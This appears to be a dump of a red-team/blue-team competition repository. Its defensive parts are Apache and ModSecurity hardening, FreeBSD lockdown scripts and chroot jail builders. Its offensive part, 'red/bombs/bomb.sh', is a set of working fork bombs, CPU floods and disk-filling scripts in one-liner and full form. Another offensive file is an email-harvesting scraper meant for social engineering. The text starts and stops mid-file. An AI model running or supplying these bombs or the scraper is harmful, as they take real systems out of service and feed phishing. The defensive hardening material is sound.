KeepAlive On 5 | MaxKeepAliveRequests 100 6 | KeepAliveTimeout 5 7 | 8 | StartServers 5 9 | MinSpareServers 5 10 | MaxSpareServers 10 11 | MaxClients 150 12 | MaxRequestsPerChild 0 13 | 14 | 15 | StartServers 2 16 | MinSpareThreads 25 17 | MaxSpareThreads 75 18 | ThreadLimit 64 19 | ThreadsPerChild 25 20 | MaxClients 150 21 | MaxRequestsPerChild 0 22 | 23 | 24 | StartServers 2 25 | MinSpareThreads 25 26 | MaxSpareThreads 75 27 | ThreadLimit 64 28 | ThreadsPerChild 25 29 | MaxClients 150 30 | MaxRequestsPerChild 0 31 | 32 | User ${APACHE_RUN_USER} 33 | Group ${APACHE_RUN_GROUP} 34 | AccessFileName .htaccess 35 | 36 | Order allow,deny 37 | Deny from all 38 | Satisfy all 39 | 40 | DefaultType None 41 | HostnameLookups Off 42 | ErrorLog ${APACHE_LOG_DIR}/error.log 43 | LogLevel warn 44 | Include mods-enabled/*.load 45 | Include mods-enabled/*.conf 46 | Include ports.conf 47 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 48 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 49 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 50 | LogFormat "%{Referer}i -> %U" referer 51 | LogFormat "%{User-agent}i" agent 52 | Include conf.d/ 53 | Include sites-enabled/ 54 | ServerSignature Off 55 | ServerTokens Prod 56 | TraceEnable Off 57 | FileETag None 58 | LimitRequestLine 4000 59 | MaxRequestsPerChild 10000 60 | LimitRequestFieldSize 4000 61 | LimitRequestFields 40 62 | LimitRequestBody 25000 63 | 64 | Order allow,deny 65 | Allow from all 66 | 67 | Deny from all 68 | 69 | 70 | 71 | Options -Indexes 72 | 73 | -------------------------------------------------------------------------------- /red/SE/email_scrape.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #Jackson Sadowski 3 | #Pen Testing 4 | #Email Scraper 5 | 6 | from collections import OrderedDict 7 | import urllib2 8 | import sys 9 | import re 10 | 11 | #all the final emails 12 | 
finalEmails = [] 13 | 14 | #grabs the content of the page 15 | def getPageContent(url): 16 | try: 17 | response = urllib2.urlopen(url) 18 | html = response.read() 19 | print "Crawling " + str(url) 20 | return html 21 | #handling any error 22 | except: 23 | print "Error: URL couldn't be reached." 24 | return "" 25 | 26 | #finds the urls on the page 27 | def findUrls(html, site): 28 | urls = [] 29 | matches = re.findall(' 2: 55 | for item in range(0, int(sys.argv[2])): 56 | fh.write(item) 57 | fh.write("\n") 58 | else: 59 | for item in emailSet: 60 | fh.write(item) 61 | fh.write("\n") 62 | 63 | fh.close() 64 | 65 | def main(): 66 | args = sys.argv 67 | if len(args) < 2: 68 | print "USAGE: scrape.py URL [Number of Emails]" 69 | sys.exit(1) 70 | 71 | print "Starting scraper..." 72 | domain = args[1] 73 | 74 | pageContent = getPageContent(domain) 75 | urls = findUrls(pageContent, domain) 76 | 77 | for url in urls: 78 | content = getPageContent(url) 79 | findEmail(content) 80 | 81 | writeToFile(finalEmails) 82 | main() 83 | -------------------------------------------------------------------------------- /blue/apache2/apache2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #apache2 statup script 3 | 4 | #installing just in case it's not 5 | apt-get install apache2 -y 6 | 7 | #stopping apache server 8 | service apache2 stop 9 | 10 | #making a backup of the fresh configs 11 | mv /etc/apache2/apache2.conf /etc/apache2/apache2.conf.bak 12 | mv /etc/apache2/ports.conf /etc/apache2/ports.conf.bak 13 | 14 | #moving premade config to apache dir 15 | mv `pwd`/conf /etc/apache2/apache2.conf 16 | 17 | #making the new ports.conf file 18 | echo "NameVirtualHost *:80" > /etc/apache2/ports.conf 19 | echo "Listen 80" >> /etc/apache2/ports.conf 20 | echo "" >> /etc/apache2/ports.conf 21 | echo "" >> /etc/apache2/ports.conf 22 | echo "" >> /etc/apache2/ports.conf 23 | echo " Listen 443" >> /etc/apache2/ports.conf 24 | echo "" >> 
/etc/apache2/ports.conf 25 | 26 | #restarting service 27 | service apache2 restart 28 | 29 | #MOD SECURITY SECTION 30 | #installing dependencies 31 | apt-get install libxml2 libxml2-dev libxml2-utils -y 32 | apt-get install libaprutil1 libaprutil1-dev -y 33 | apt-get install php5 -y 34 | 35 | #installing mod security 36 | apt-get install libapache-mod-security -y 37 | 38 | #moving in my config file 39 | mv /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf.bak 40 | mv `pwd`/mod /etc/modsecurity/modsecurity.conf 41 | 42 | #installing OWASP Security measures 43 | wget -O SpiderLabs-owasp-modsecurity-crs.tar.gz https://github.com/SpiderLabs/owasp-modsecurity-crs/tarball/master 44 | tar -zxf SpiderLabs-owasp-modsecurity-crs.tar.gz 45 | cp -R SpiderLabs-owasp-modsecurity-crs-*/* /etc/modsecurity/ 46 | rm SpiderLabs-owasp-modsecurity-crs.tar.gz 47 | rm -R SpiderLabs-owasp-modsecurity-crs-* 48 | mv /etc/modsecurity/modsecurity_crs_10_setup.conf.example /etc/modsecurity/modsecurity_crs_10_setup.conf 49 | 50 | #creating links 51 | cd /etc/modsecurity/base_rules 52 | for f in * ; do ln -s /etc/modsecurity/base_rules/$f /etc/modsecurity/activated_rules/$f ; done 53 | cd /etc/modsecurity/optional_rules 54 | for f in * ; do ln -s /etc/modsecurity/optional_rules/$f /etc/modsecurity/activated_rules/$f ; done 55 | 56 | #adding a php rule 57 | echo "expose_php = Off" >> /etc/php5/apache2/php.ini 58 | 59 | #restarting apache to enable 60 | service apache2 restart 61 | -------------------------------------------------------------------------------- /red/bombs/bomb.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #bombs are mainly for cpu depletion but also attempt to deplete hard drive space. if CPU is maxed out this doesn't happen very quickly 3 | #hdd-fillers are just meant to fill the hard drive quickly. CPU may be used up, but usually not fully. 
4 | #wallbomb takes up CPU and is super annoying 5 | 6 | #yesbomb one 7 | #oneliner 8 | :{for(( i=0;;i+=1));do;yes balls>.$1$i&disown;done};words=`cat /usr/share/dict/words`;:kittykatz&disown;c=0;while true;do;for word in $words;do;:$word$c&disown;done;((c++));done 9 | #full 10 | : 11 | { 12 | for (( i=0; ; i+=1 )); do 13 | yes balls > .$1$i & disown 14 | done 15 | } 16 | words=`cat /usr/share/dict/words` 17 | : kittykatz & disown 18 | c=0 19 | while true; do 20 | for word in $words; do 21 | : $word$c & disown 22 | done 23 | ((c++)) 24 | done 25 | 26 | #yesbomb two 27 | #oneliner 28 | :{for((i=0;;i+=1));do;man bash|yes>.$1$i&disown;done};words=`cat /usr/share/dict/words`;:kittykatz&disown;c=0;while true;do;for word in $words;do;:$word$c&disown;done;((c++));done 29 | #full 30 | : 31 | { 32 | for (( i=0; ; i+=1 )); do 33 | man bash | yes > .$1$i & disown 34 | done 35 | } 36 | words=`cat /usr/share/dict/words` 37 | : kittykatz & disown 38 | c=0 39 | while true; do 40 | for word in $words; do 41 | : $word$c & disown 42 | done 43 | ((c++)) 44 | done 45 | 46 | #bomb three (truncate) - needs testing 47 | #oneliner 48 | :{for((i=0;;i+=1));do;truncate -s 1G .$1$i&disown;done};:kittykatz&disown;c=0;while true;do;for word in $words;do;:$word$c&disown;done;((c++));done 49 | #full 50 | : 51 | { 52 | for (( i=0; ; i+=1 )); do 53 | truncate -s 1G .$1$i & disown 54 | done 55 | } 56 | : kittykatz & disown 57 | c=0 58 | while true; do 59 | for word in $words; do 60 | : $word$c & disown 61 | done 62 | ((c++)) 63 | done 64 | 65 | #bomb four (dd) - tested and rapes system 66 | #oneliner 67 | 68 | #full 69 | : 70 | { 71 | for (( i=0; ; i+=1 )); do 72 | dd if=/dev/urandom of=./.$1$i & disown 73 | done 74 | } 75 | : kittykatz & disown 76 | c=0 77 | while true; do 78 | for word in $words; do 79 | : $word$c & disown 80 | done 81 | ((c++)) 82 | done 83 | 84 | #bomb five truncate and morph - needs testing 85 | #bomb and hdd-filler 86 | #oneliner 87 | 88 | #full 89 | : 90 | { 91 | for (( i=0; 
; i+=1 )); do 92 | mv $1 .$1$i 93 | done 94 | } 95 | c=0 96 | while true; do 97 | truncate -s 30G .$c 98 | : .$c & disown 99 | if [ $c -eq 10 ]; then 100 | break 101 | fi 102 | ((c++)) 103 | done 104 | 105 | #hdd-filler 2 106 | dd if=/dev/urandom of=./.file & disown 107 | 108 | #hdd-filler 3 109 | truncate -s 1000000G .file & disown 110 | 111 | #wallbomb 112 | #oneliner 113 | :(){echo "balls"|wall;:|:&disown};:&disown 114 | #full 115 | : 116 | { 117 | echo "balls" | wall 118 | : | : & disown 119 | } 120 | : & disown 121 | -------------------------------------------------------------------------------- /blue/startup-bsd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #startup script for freebsd 3 | #MAKE SURE ALL THE TXT FILES ARE CORRECT 4 | #BEFORE RUNNING THIS SCRIPT 5 | #must be run as root 6 | #Text files needed: 7 | #ipfw.sh - will be a script containing the iptables rules you want 8 | 9 | IP_ADDR=10.2.3.3 10 | NETMASK=255.255.255.240 11 | GATEWAY=10.2.3.0 12 | TEAM_DNS_SRV=10.2.3.1 13 | 14 | #if not 1 param 15 | if [ $# -ne 1 ] 16 | then 17 | set "em0" 18 | echo "expected name of main interface, but automatically assumed to be 'em0'" 19 | fi 20 | 21 | /sbin/ifconfig $1 down 22 | 23 | def backup() 24 | { 25 | test -d /root/stuff || mkdir /root/stuff 26 | cd /root/stuff 27 | dirs="boot bin sbin etc var root home lib usr lib64" 28 | for dir in $dirs; do 29 | /bin/tar -cjf $dir.tar.bz /$dir 30 | /bin/tar -rf ../notes.tar stuff/$dir.tar.bz 31 | done 32 | } 33 | 34 | outfile=info.txt #set output file 35 | 36 | #cronjobs aka blowjob - remove cron for all users 37 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 38 | for user in $users; do 39 | crontab -r -u $user 40 | done &> /dev/null 41 | 42 | #destroy cron and anacron completely 43 | /bin/chown root:wheel /etc/crontab 44 | /bin/chmod o= /etc/crontab 45 | /bin/mv /etc/crontab /etc/.crontab.bak 46 | /bin/chflags schg /etc/.crontab.bak 47 | /bin/chmod 
o= /usr/bin/crontab 48 | 49 | /bin/chown root:wheel /usr/bin/crontab 50 | /bin/chmod o= /usr/bin/crontab 51 | /bin/chflags schg /usr/bin/crontab 52 | 53 | if [ test -e "/etc/anacrontab" ]; then 54 | /bin/chown root:wheel /etc/anacrontab 55 | /bin/chmod o= /etc/anacrontab 56 | /bin/chflags schg /etc/anacrontab 57 | 58 | /bin/chown root:wheel /usr/sbin/anacron 59 | /bin/chmod o= /usr/sbin/anacron 60 | /bin/chflags schg /usr/sbin/anacron 61 | 62 | /bin/chown root:wheel /etc/anacrontab 63 | /bin/mv /etc/anacrontab /etc/.anacrontab.bak 64 | /bin/chflags schg /etc/anacrontab 65 | fi 66 | 67 | #handle filez 68 | /bin/chmod ugo= /usr/bin/rlogin 69 | /bin/chmod ugo= /usr/bin/rsh 70 | /bin/chmod o= /usr/bin/at 71 | /bin/chmod o= /usr/bin/atq 72 | /bin/chmod o= /usr/bin/atrm 73 | /bin/chmod o= /usr/bin/batch 74 | /bin/chmod o= /etc/fstab 75 | /bin/chmod o= /etc/ftpusers 76 | /bin/chmod o= /etc/group 77 | /bin/chmod o= /etc/hosts 78 | /bin/chmod o= /etc/hosts.allow 79 | /bin/chmod o= /etc/hosts.equiv 80 | /bin/chmod o= /etc/hosts.lpd 81 | /bin/chmod o= /etc/inetd.conf 82 | /bin/chmod o= /etc/login.access 83 | /bin/chmod o= /etc/login.conf 84 | /bin/chmod o= /etc/newsyslog.conf 85 | /bin/chmod o= /etc/rc.conf 86 | /bin/chmod o= /etc/ssh/sshd_config 87 | /bin/chmod o= /etc/sysctl.conf 88 | /bin/chmod o= /etc/syslog.conf 89 | /bin/chmod o= /etc/ttys 90 | 91 | #firewall stuff 92 | /usr/bin/service ipfw start 93 | /bin/cp /etc/rc.conf /etc/rc.conf.bak 94 | ./ipfw.sh 95 | echo "firewall_enable=\"YES\"" > /etc/rc.conf 96 | echo "firewall_type=\"client\"" >> /etc/rc.conf 97 | echo "firewall_script=\"`pwd`/ipfw.sh\"" >> /etc/rc.conf 98 | echo "firewall_logging=\"YES\"" >> /etc/rc.conf 99 | 100 | #other startup stuff 101 | echo "ipv6_enable=\"NO\"" >> /etc/rc.conf 102 | echo "inetd_enable=\"NO\"" >> /etc/rc.conf 103 | echo "sendmail_enable=\"NONE\"" >> /etc/rc.conf 104 | echo "portmap_enable=\"NO\"" >> /etc/rc.conf 105 | echo "clear_tmp_enable=\"YES\"" >> /etc/rc.conf 106 | echo 
"syslogd_flags=\"-ss\"" >> /etc/rc.conf 107 | echo "icmp_drop_redirect=\"YES\"" >> /etc/rc.conf 108 | 109 | #stop usually unnecessary services 110 | services="cron cups samba smbd inetd portmap rsync rlogin" 111 | for service in $services; do 112 | /usr/sbin/service $service stop 113 | echo "/usr/sbin/service $service stop" >> /usr/local/etc/rc.d/services.sh 114 | done 115 | chmod u+x /usr/local/etc/rc.d/services.sh 116 | 117 | #set static ip address, gateway and DNS 118 | /sbin/ifconfig $1 $IP_ADDR netmask $NETMASK 119 | /sbin/route add default $GATEWAY 120 | echo "nameserver 8.8.8.8" >> /etc/resolv.conf 121 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf 122 | #echo "nameserver $TEAM_DNS_SRV" >> /etc/resolv.conf 123 | 124 | #add to startup file 125 | echo "ifconfig_$1=\"$IP_ADDR netmask $NETMASK\"" >> /etc/rc.conf 126 | echo "default_router=\"$GATEWAY\"" >> /etc/rc.conf 127 | 128 | #hosts file mgmt 129 | hosts="/etc/hosts" 130 | 131 | /bin/chflags noschg $hosts 132 | /bin/cp $hosts $hosts.backup 133 | echo "127.0.0.1 localhost" > $hosts 134 | /bin/chown root:wheel $hosts 135 | /bin/chmod 600 $hosts 136 | /bin/chflags schg $hosts 137 | 138 | #remove all users but root from wheel group 139 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 140 | for user in $users; do 141 | pw groupmod wheel -d $user 142 | done &> /dev/null 143 | 144 | #edit sudoers 145 | if [ test -e "/usr/local/etc/sudoers" ]; then 146 | /bin/mv /usr/local/etc/sudoers /usr/local/etc/.sudoers.bak 147 | echo " " > /usr/local/etc/sudoers 148 | /bin/chown root:wheel /usr/local/etc/sudoers 149 | /bin/chmod 000 /usr/local/etc/sudoers 150 | /bin/chflags schg /usr/local/etc/sudoers 151 | fi 152 | 153 | #bring networking back up 154 | /sbin/ifconfig $1 up 155 | 156 | #update 157 | /usr/sbin/freebsd-update fetch install &disown &>.updateinfo.txt 158 | 159 | #make chrooted jail for ssh 160 | 161 | 162 | #Make Sure No Non-Root Accounts Have UID Set To 0 163 | echo "Accounts with UID = 0" >> $outfile 164 | echo 
`/usr/bin/awk -F: '($3 == "0") {print}' /etc/passwd` >> $outfile 165 | echo "" >> $outfile 166 | 167 | #all listening ports 168 | echo "All the ports that you're listening on" >> $outfile 169 | echo `/usr/bin/netstat -na | /usr/bin/grep -iF listen` >> $outfile 170 | echo "" >> $outfile 171 | 172 | #finding all of the world-writeable files 173 | echo "All of the world-writable files" >> $outfile 174 | echo `/usr/bin/find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print` >> $outfile &disown 175 | 176 | #backup important files and directories 177 | backup &>.backup_info.txt &disown 178 | 179 | #rename certain executables and chattr them 180 | /bin/mv /usr/bin/gcc /usr/bin/zgcc 181 | /bin/chflags schg /usr/bin/zgcc 182 | /bin/mv /sbin/reboot /sbin/zreboot 183 | /bin/chflags schg /sbin/zreboot 184 | /bin/mv /sbin/shutdown /sbin/zshutdown 185 | /bin/chflags schg /sbin/zshutdown 186 | 187 | 188 | 189 | -------------------------------------------------------------------------------- /blue/jail_maker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Author: Luke Matarazzo 3 | # Copyright (c) 2013, Luke Matarazzo 4 | # All rights reserved. 5 | # TO DO: 6 | # add full paths to any commands (see copy_libraries()) 7 | # add user resource management (to limit effect of forkbomb, etc.) 8 | 9 | if [ "$1" = "-h" -o "$1" = "--help" ]; then 10 | echo "Usage: ./jail_maker [OPTION] [JAIL_PATH]" 11 | #echo " ./jail_maker [CONFIG_FILE]" 12 | echo "Note: must be run as root." 13 | echo "Create a jail environment to be used as in a chroot jail configuration." 
14 | echo "" 15 | echo "Invoking the script without any parameters will enter the script in manual configuration mode in which it will prompt you on how to create the jail" 16 | echo " -h, --help print this help information" 17 | echo " -s, --secure configure a very secure jail with the bare minimum" 18 | echo " of executables and libraries" 19 | echo "" 20 | echo "Remember: must be run as root to 100% successful. When script prompts for users, it creates their home directory in the jail and assumes they already exist as users on the system and gives them ownership of their home directories. If they don't yet exist, you will have to manually change the ownership of their home directories after the script runs." 21 | fi 22 | 23 | copy_libraries(){ 24 | # iggy ld-linux* file as it is not shared one 25 | FILES="$(ldd $1 | awk '{ print $3 }' | egrep -v ^'\(')" 26 | 27 | #echo "Copying shared files/libs to $path..." 28 | for i in $FILES 29 | do 30 | d="$(dirname $i)" 31 | [ ! -d $path$d ] && /bin/mkdir -p $path$d || : 32 | /bin/cp $i $path$d 33 | done 34 | 35 | # copy /lib/ld-linux* or /lib64/ld-linux* to $path/$sldlsubdir 36 | # get ld-linux full file location 37 | sldl="$(ldd $1 | grep 'ld-linux' | awk '{ print $1}')" 38 | # now get sub-dir 39 | sldlsubdir="$(dirname $sldl)" 40 | 41 | if [ ! -f $path$sldl ]; 42 | then 43 | #echo "Copying $sldl $path$sldlsubdir..." 44 | /bin/cp $sldl $path$sldlsubdir 45 | else 46 | : 47 | fi 48 | } 49 | 50 | error_file=".jm_error" 51 | 52 | if [ "$1" = "-s" -o "$1" = "--secure" ]; then 53 | if [ "$#" -ne 2 ]; then 54 | echo "A jail path must be specified with the --secure (-s) option." 55 | exit 1 56 | fi 57 | 58 | shift 59 | echo "Initializing secure jail setup..." 
60 | if test -d $1; then 61 | cd $1 62 | path=`echo $PWD` 63 | else 64 | path="$1" 65 | fi 66 | shift 67 | 68 | #set up jail environment directories 69 | /bin/mkdir -p $path 70 | /bin/mkdir -p $path/{dev,etc,lib,usr,bin,home} 71 | /bin/mkdir -p $path/usr/bin 72 | user="none" 73 | while [ true ]; do 74 | read -p "Enter users to be placed in jail (leave blank if no more users): " user 75 | if [ "$user" = "" ]; then 76 | break; 77 | fi 78 | groupadd sshusers 79 | /usr/sbin/usermod -g sshusers $user 80 | /bin/mkdir -p $path/home/$user 81 | /bin/chmod 750 $path/home/$user 82 | /bin/chown -f $user $path/home/$user 83 | done 84 | /bin/chown -f root.root $path 85 | /bin/mknod -m 666 $path/dev/null c 1 3 86 | 87 | #copy over bare minimum files 88 | /bin/cp /etc/ld.so.cache $path/etc 89 | /bin/cp /etc/ld.so.conf $path/etc 90 | /bin/cp /etc/nsswitch.conf $path/etc 91 | /bin/cp /etc/hosts $path/etc 92 | 93 | #copy bare minimum executables 94 | /bin/cp /bin/ls $path/bin 95 | /bin/cp /bin/bash $path/bin 96 | /bin/cp /bin/cat $path/bin 97 | /bin/cp /bin/cp $path/bin 98 | /bin/cp /bin/mv $path/bin 99 | /bin/cp /bin/rm $path/bin 100 | /bin/cp /bin/mkdir $path/bin 101 | /bin/cp /bin/rmdir $path/bin 102 | /bin/cp /bin/dir $path/bin 103 | /bin/cp /bin/pwd $path/bin 104 | /bin/cp /usr/bin/vi $path/usr/bin 105 | 106 | set "/bin/ls /bin/cat /bin/bash /bin/cp /bin/mv /bin/rm /bin/mkdir /bin/rmdir /bin/dir /bin/pwd /usr/bin/vi" 107 | 108 | #copy appropriate libraries 109 | for exec in $@; do 110 | copy_libraries $exec 111 | done 2> $error_file 112 | 113 | if test -e $error_file; then 114 | echo "Some libraries may not have copied properly" 115 | /bin/rm $error_file 116 | fi 117 | fi 118 | 119 | if [ "$#" -eq 0 ]; then 120 | echo "Initializing manual setup" 121 | read -p "Enter path of jail directory: " dir 122 | if test -d $dir; then 123 | cd $dir 124 | path=`echo $PWD` 125 | else 126 | path="$dir" 127 | fi 128 | 129 | #set up jail environment directories 130 | /bin/mkdir -p $path 131 | 
/bin/mkdir -p $path/{dev,etc,lib,usr,bin,home} 132 | /bin/mkdir -p $path/usr/bin 133 | user="none" 134 | while [ true ]; do 135 | read -p "Enter users to be placed in jail (leave blank if no more users): " user 136 | if [ "$user" = "" ]; then 137 | break; 138 | fi 139 | /bin/mkdir -p $path/home/$user 140 | /bin/chmod 750 $path/home/$user 141 | /bin/chown -f $user $path/home/$user 142 | done 143 | /bin/chown -f root.root $path 144 | /bin/mknod -m 666 $path/dev/null c 1 3 145 | 146 | #copy over bare minimum files 147 | /bin/cp /etc/ld.so.cache $path/etc 148 | /bin/cp /etc/ld.so.conf $path/etc 149 | /bin/cp /etc/nsswitch.conf $path/etc 150 | /bin/cp /etc/hosts $path/etc 151 | 152 | #ask and copy executables 153 | echo "Which executables would you like in your jail?" 154 | common_bins=`/bin/ls /bin` 155 | 156 | for i in $common_bins; do 157 | read -p "$i (Y/N):" choice 158 | choice=`echo $choice | tr '[:lower:]' '[:upper:]'` 159 | if [ "$choice" = "Y" -o "$choice" = "YES" ]; then 160 | /bin/cp /bin/$i $path/bin 161 | bins+="/bin/$i " 162 | fi 163 | done 164 | 165 | read -p "Would you like to choose between a few common binaries in /usr/bin (Y/N): " more_bins 166 | more_bins=`echo $more_bins | tr '[:lower:]' '[:upper:]'` 167 | if [ "$more_bins" = "YES" -o "$more_bins" = "Y" ]; then 168 | other_bins="awk clear cut diff expr head less man nano paste pico split strings strip tail tee test touch tr uniq users uptime vi w wall wc wget whatis who whoami yes zip zipgrep" 169 | 170 | for i in $other_bins; do 171 | read -p "$i (Y/N):" choice 172 | choice=`echo $choice | tr '[:lower:]' '[:upper:]'` 173 | if [ "$choice" = "Y" -o "$choice" = "YES" ]; then 174 | /bin/cp /usr/bin/$i $path/usr/bin 175 | bins+="/usr/bin/$i " 176 | fi 177 | done 178 | fi 179 | 180 | #copy appropriate libraries 181 | set $bins 182 | 183 | for exec in $@; do 184 | copy_libraries $exec 185 | done 2> $error_file 186 | 187 | if test -e $error_file; then 188 | echo "Some libraries may not have copied 
properly" 189 | /bin/rm $error_file 190 | fi 191 | fi 192 | -------------------------------------------------------------------------------- /blue/jail_maker_freebsd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # Author: Luke Matarazzo 3 | # Copyright (c) 2013, Luke Matarazzo 4 | # All rights reserved. 5 | 6 | if [ "$1" = "-h" -o "$1" = "--help" ]; then 7 | echo "Usage: ./jail_maker [OPTION] [JAIL_PATH]" 8 | #echo " ./jail_maker [CONFIG_FILE]" 9 | echo "Note: must be run as root." 10 | echo "Create a jail environment to be used as in a chroot jail configuration." 11 | echo "" 12 | echo "Invoking the script without any parameters will enter the script in manual configuration mode in which it will prompt you on how to create the jail" 13 | echo " -h, --help print this help information" 14 | echo " -s, --secure configure a very secure jail with the bare minimum" 15 | echo " of executables and libraries" 16 | echo "" 17 | echo "Remember: must be run as root to 100% successful. When script prompts for users, it creates their home directory in the jail and assumes they already exist as users on the system and gives them ownership of their home directories. If they don't yet exist, you will have to manually change the ownership of their home directories after the script runs." 18 | fi 19 | 20 | copy_libraries(){ 21 | # iggy ld-linux* file as it is not shared one 22 | FILES="$(/usr/bin/ldd $1 | /usr/bin/awk '{ print $3 }' |/usr/bin/egrep -v ^'\(')" 23 | 24 | #echo "Copying shared files/libs to $path..." 25 | for i in $FILES 26 | do 27 | d="$(dirname $i)" 28 | [ ! 
-d $path$d ] && /bin/mkdir -p $path$d || : 29 | /bin/cp $i $path$d 30 | done 31 | 32 | # copy /lib/ld-linux* or /lib64/ld-linux* to $path/$sldlsubdir 33 | # get ld-linux full file location 34 | sldl="$(/usr/bin/ldd $1 | /usr/bin/grep 'ld-linux' | /usr/bin/awk '{ print $1}')" 35 | # now get sub-dir 36 | sldlsubdir="$(dirname $sldl)" 37 | 38 | if [ ! -f $path$sldl ]; 39 | then 40 | #echo "Copying $sldl $path$sldlsubdir..." 41 | /bin/cp $sldl $path$sldlsubdir 42 | else 43 | : 44 | fi 45 | } 46 | 47 | error_file=".jm_error" 48 | 49 | if [ "$1" = "-s" -o "$1" = "--secure" ]; then 50 | if [ "$#" -ne 2 ]; then 51 | echo "A jail path must be specified with the --secure (-s) option." 52 | exit 1 53 | fi 54 | 55 | shift 56 | echo "Initializing secure jail setup..." 57 | if test -d $1; then 58 | cd $1 59 | path=`echo $PWD` 60 | else 61 | path="$1" 62 | fi 63 | shift 64 | 65 | #set up jail environment directories 66 | /bin/mkdir -p $path 67 | /bin/mkdir -p $path/{dev,etc,lib,libexec,usr,bin,home} 68 | /bin/mkdir -p $path/usr/bin 69 | user="none" 70 | while [ true ]; do 71 | read -p "Enter users to be placed in jail (leave blank if no more users): " user 72 | if [ "$user" = "" ]; then 73 | break; 74 | fi 75 | /bin/mkdir -p $path/home/$user 76 | /bin/chmod 750 $path/home/$user 77 | /usr/sbin/chown -f $user $path/home/$user 78 | done 79 | /usr/sbin/chown -f root:wheel $path 80 | /sbin/mknod $path/dev/null c 1 3 81 | 82 | #copy over bare minimum files 83 | /bin/cp /libexec/ld-elf.so.1 $path/libexec/ld-elf.so.1 84 | /bin/cp /etc/nsswitch.conf $path/etc 85 | /bin/cp /etc/hosts $path/etc 86 | 87 | #copy bare minimum executables 88 | /bin/cp /bin/ls $path/bin 89 | /bin/cp /bin/cat $path/bin 90 | /bin/cp /bin/sh $path/bin 91 | /bin/cp /bin/cp $path/bin 92 | /bin/cp /bin/mv $path/bin 93 | /bin/cp /bin/rm $path/bin 94 | /bin/cp /bin/mkdir $path/bin 95 | /bin/cp /bin/rmdir $path/bin 96 | /bin/cp /bin/pwd $path/bin 97 | /bin/cp /usr/bin/vi $path/usr/bin 98 | 99 | set "/bin/ls /bin/sh 
/bin/cat /bin/cp /bin/mv /bin/rm /bin/mkdir /bin/rmdir /bin/pwd /usr/bin/vi" 100 | 101 | #copy appropriate libraries 102 | for exec in $@; do 103 | copy_libraries $exec 104 | done 2> $error_file 105 | 106 | if test -e $error_file; then 107 | echo "Some libraries may not have copied properly" 108 | /bin/rm $error_file 109 | fi 110 | fi 111 | 112 | if [ "$#" -eq 0 ]; then 113 | echo "Initializing manual setup" 114 | read -p "Enter path of jail directory: " dir 115 | if test -d $dir; then 116 | cd $dir 117 | path=`echo $PWD` 118 | else 119 | path="$dir" 120 | fi 121 | 122 | #set up jail environment directories 123 | /bin/mkdir -p $path 124 | /bin/mkdir -p $path/{dev,etc,lib,libexec,usr,bin,home,var,tmp} 125 | /bin/mkdir -p $path/var/tmp 126 | /bin/mkdir -p $path/tmp/vi.recover 127 | /usr/sbin/chown 777 $path/tmp/vi.recover 128 | /bin/ln -s $path/tmp $path/var/tmp 129 | /bin/mkdir -p $path/usr/bin 130 | /bin/mkdir -p $path/usr/share/misc 131 | user="none" 132 | while [ true ]; do 133 | read -p "Enter users to be placed in jail (leave blank if no more users): " user 134 | if [ "$user" = "" ]; then 135 | break; 136 | fi 137 | /bin/mkdir -p $path/home/$user 138 | /bin/cp /home/$user/.* $path/home/$user &> /dev/null 139 | # /usr/sbin/chown -f -R $user:wheel $path/home/$user/.* 140 | /bin/chmod -R 750 $path/home/$user 141 | /usr/sbin/chown -f -R $user $path/home/$user 142 | done 143 | /usr/sbin/chown -f root:wheel $path 144 | /sbin/mknod $path/dev/null c 1 3 145 | 146 | #copy over bare minimum files 147 | /bin/cp /libexec/ld-elf.so.1 $path/libexec 148 | /bin/cp /etc/termcap.small $path/etc 149 | /bin/cp /usr/share/misc/termcap $path/usr/share/misc 150 | /bin/cp /etc/nsswitch.conf $path/etc 151 | /bin/cp /etc/hosts $path/etc 152 | 153 | #ask and copy executables 154 | echo "Which executables would you like in your jail?" 
155 | common_bins=`ls /bin` 156 | 157 | for i in $common_bins; do 158 | read -p "$i (Y/N):" choice 159 | choice=`echo $choice | tr '[:lower:]' '[:upper:]'` 160 | if [ "$choice" = "Y" -o "$choice" = "YES" ]; then 161 | /bin/cp /bin/$i $path/bin 162 | bins+="/bin/$i " 163 | fi 164 | done 165 | 166 | read -p "Would you like to choose between a few common binaries in /usr/bin (Y/N): " more_bins 167 | more_bins=`echo $more_bins | tr '[:lower:]' '[:upper:]'` 168 | if [ "$more_bins" = "YES" -o "$more_bins" = "Y" ]; then 169 | other_bins="awk clear cut diff expr head less man nano paste pico split strings strip tail tee test touch tr uniq users uptime vi w wall wc wget whatis who whoami yes zip zipgrep" 170 | 171 | for i in $other_bins; do 172 | read -p "$i (Y/N):" choice 173 | choice=`echo $choice | tr '[:lower:]' '[:upper:]'` 174 | if [ "$choice" = "Y" -o "$choice" = "YES" ]; then 175 | /bin/cp /usr/bin/$i $path/usr/bin 176 | bins+="/usr/bin/$i " 177 | fi 178 | done 179 | fi 180 | 181 | #copy appropriate libraries 182 | set $bins 183 | 184 | for exec in $@; do 185 | copy_libraries $exec 186 | done 2> $error_file 187 | 188 | if test -e $error_file; then 189 | echo "Some libraries may not have copied properly" 190 | /bin/rm $error_file 191 | fi 192 | fi 193 | -------------------------------------------------------------------------------- /blue/startup-linux.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #MAKE SURE ALL THE TXT FILES ARE CORRECT 3 | #BEFORE RUNNING THIS SCRIPT 4 | #must be run as root 5 | #must change root password first! must! 
